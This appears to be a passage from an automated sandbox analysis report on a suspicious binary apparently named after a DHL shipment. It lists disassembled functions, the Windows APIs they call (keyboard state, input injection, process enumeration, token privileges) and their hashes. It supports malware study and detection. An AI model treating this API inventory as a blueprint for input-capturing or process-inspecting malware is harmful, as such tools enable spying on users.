                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00056D71,00000000,00000000,000582D9,?,000582D9,?,00000001,00056D71,8BE85006,00000001,000582D9,000582D9), ref: 0006D910
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006D999
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006D9AB
                                                                                      • __freea.LIBCMT ref: 0006D9B4
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                                                                      • Instruction ID: 9bff75bbb65425934817ff584f8020d5da37f28b04ecf4eb17eb4ac2e3a08b6f
                                                                                      • Opcode Fuzzy Hash: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                                                                      • Instruction Fuzzy Hash: 0031AD72A0020AABEF259F65DC45EEF7BA6EB41310B05416AFC08D7291EB35CD54CBA0
                                                                                      Function 0009AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0009ABF1
                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 0009AC0D
                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 0009AC74
                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0009ACC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                                                                      • Instruction ID: 2c3ec746e1f28ab5756165947c12a4314cf1ba7882c4f6a084e9368e193ec3d2
                                                                                      • Opcode Fuzzy Hash: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                                                                      • Instruction Fuzzy Hash: 6A3106B0B046186FFF35CB65CC04BFE7BE5AB8A321F04461AE4859A1D1C3798985A7D2
                                                                                      Function 000C16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 000C16EB
                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                      • GetCaretPos.USER32(?), ref: 000C16FF
                                                                                      • ClientToScreen.USER32(00000000,?), ref: 000C174C
                                                                                      • GetForegroundWindow.USER32 ref: 000C1752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                      • String ID:
                                                                                      • API String ID: 2759813231-0
                                                                                      • Opcode ID: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                                                                      • Instruction ID: bc3ab090f351f151e8d7821f02604cd360b918b05cb1d28ee6586bdd5cc126f6
                                                                                      • Opcode Fuzzy Hash: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                                                                      • Instruction Fuzzy Hash: 22315E75D04249AFDB04EFA9C881DEEBBFDEF49304B5080A9E419E7212D6319E45CFA0
                                                                                      Function 0009D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0009D52F
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 420147892-0
                                                                                      • Opcode ID: e66a735b83ea5fcf66693618b34dc9d11d5c0efe12978dd7770500357b790614
                                                                                      • Instruction ID: d0d3072cf855d5879fce946656e465ba494c6f3fa5ec470c84509812d43f047b
                                                                                      • Opcode Fuzzy Hash: e66a735b83ea5fcf66693618b34dc9d11d5c0efe12978dd7770500357b790614
                                                                                      • Instruction Fuzzy Hash: 2731A4711083009FD701EF54C881EAFBBF8EFD9354F54092DF585861A2EB719945CB92
                                                                                      Function 0009D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNEL32(?,000CCB68), ref: 0009D2FB
                                                                                      • GetLastError.KERNEL32 ref: 0009D30A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0009D319
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000CCB68), ref: 0009D376
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 2267087916-0
                                                                                      • Opcode ID: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                                                                      • Instruction ID: 3514d33584b73f11b46aea954a1fd1f59d59fb59b1af040dc19ec16f4125f7f0
                                                                                      • Opcode Fuzzy Hash: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                                                                      • Instruction Fuzzy Hash: E121A370548201DF9B10DF24C8818AE77E8EF55365F508A1EF499C72A2DB30DA46DB93
                                                                                      Function 00091571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                                                                        • Part of subcall function 00091014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                                                                        • Part of subcall function 00091014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                                                                        • Part of subcall function 00091014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                                                                        • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000915BE
                                                                                      • _memcmp.LIBVCRUNTIME ref: 000915E1
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00091617
                                                                                      • HeapFree.KERNEL32(00000000), ref: 0009161E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1592001646-0
                                                                                      • Opcode ID: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                                                                      • Instruction ID: 9127330d878047bf95791e07e9383d4ef5514a538536e009921ca6a5a8336c11
                                                                                      • Opcode Fuzzy Hash: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                                                                      • Instruction Fuzzy Hash: 5F218C31E4410AEFEF00DFA4C949BEEB7F8EF44344F194459E445AB241E774AA05EBA0
                                                                                      Function 000C2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 000C280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000C2840
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      • Opcode ID: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                                                                      • Instruction ID: fd27a1d20b364e05cb875fa24d24a7aa4276b9f576eb43986e30a712551f43ed
                                                                                      • Opcode Fuzzy Hash: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                                                                      • Instruction Fuzzy Hash: 0C21D631209511AFE714DB24C844FAE7799AF45324F14825CF41ACBAE2CB75FC82C790
                                                                                      Function 000978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00098D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098D8C
                                                                                        • Part of subcall function 00098D7D: lstrcpyW.KERNEL32(00000000,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00098DB2
                                                                                        • Part of subcall function 00098D7D: lstrcmpiW.KERNEL32(00000000,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      • Opcode ID: 74622af115f510d11e75d7aa69a4b91cc97337d102078d993dd4876d61143c54
                                                                                      • Instruction ID: bad0bdd28ddc465f64428c6573750e1f4c3cb7f67ce4bc9b04aa661c993438ef
                                                                                      • Opcode Fuzzy Hash: 74622af115f510d11e75d7aa69a4b91cc97337d102078d993dd4876d61143c54
                                                                                      • Instruction Fuzzy Hash: 4011067A210202AFDF159F35D844E7B77E5FF85350B10402AF90ACB265EF319801D751
                                                                                      Function 000C7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C7D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 000C7D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000C7D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000AB7AD,00000000), ref: 000C7D6B
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
                                                                                      • API String ID: 847901565-0
                                                                                      • Opcode ID: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                                                                      • Instruction ID: d18f42daa83608d3fb6f8deaae32a9aa29d9d8e9e1bfee3073adf5dc6d59e548
                                                                                      • Opcode Fuzzy Hash: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                                                                      • Instruction Fuzzy Hash: 09118932604615AFDB149F28DC04EAA3BA5AF45364F158728F83ADB2F0E7349990CB90
                                                                                      Function 000C5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 000C56BB
                                                                                      • _wcslen.LIBCMT ref: 000C56CD
                                                                                      • _wcslen.LIBCMT ref: 000C56D8
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 455545452-0
                                                                                      • Opcode ID: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                                                                      • Instruction ID: ebd390d279b93f4e9926893f4898db91cc24a28c6b8af326aac0d07028e57c2c
                                                                                      • Opcode Fuzzy Hash: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                                                                      • Instruction Fuzzy Hash: 3711D379600608A6DF209F65CC85FEF77ACEF1176AB10416EF915D6081EB74EAC4CB60
                                                                                      Function 00061D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 158a7fe538311256812edf8a1b75badc0a4c79c80e7db2c2bceaef72a0a5d06d
                                                                                      • Instruction ID: df3622a80906cb5a9781c5dd74a14850f8cfaa9233c2cf005d74125fec42eba5
                                                                                      • Opcode Fuzzy Hash: 158a7fe538311256812edf8a1b75badc0a4c79c80e7db2c2bceaef72a0a5d06d
                                                                                      • Instruction Fuzzy Hash: 7C01D1B260AA163EF66126B86CC1FAB665FDF827B8F380325F521A12D2DB708C005170
                                                                                      Function 00091A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00091A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                                                                      • Instruction ID: 5f49610bfb2376e4b64e7e4bb921e42679018f4294808924b211485280e19925
                                                                                      • Opcode Fuzzy Hash: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                                                                      • Instruction Fuzzy Hash: 7411FA3AE01219FFEF119BA5C985FEDBB78EB04750F200091E604B7290D6716E50EB94
                                                                                      Function 0009E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0009E1FD
                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0009E230
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0009E246
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0009E24D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2880819207-0
                                                                                      • Opcode ID: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                                                                      • Instruction ID: 4b7b9169adb3173e20e4bfb92e158f5289372f4814cffd889db9f22cb01af219
                                                                                      • Opcode Fuzzy Hash: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                                                                      • Instruction Fuzzy Hash: 2A110872904254BBEB01DBA8EC05E9E7FADEB45320F144216F924D7691D6B48D0487A0
                                                                                      Function 0005D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,?,0005CFF9,00000000,00000004,00000000), ref: 0005D218
                                                                                      • GetLastError.KERNEL32 ref: 0005D224
                                                                                      • __dosmaperr.LIBCMT ref: 0005D22B
                                                                                      • ResumeThread.KERNEL32(00000000), ref: 0005D249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 173952441-0
                                                                                      • Opcode ID: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                                                                      • Instruction ID: a61c9d3e100bd9cf857884b26a079c15ce5dbf954d6bd248c091b3bd9a8ef812
                                                                                      • Opcode Fuzzy Hash: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                                                                      • Instruction Fuzzy Hash: 2601D276805204BBEB315BA6DC09FAF7AA9DF91332F10021BFD25961D1DB748909C7A0
                                                                                      Function 0003600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                      • GetStockObject.GDI32(00000011), ref: 00036060
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
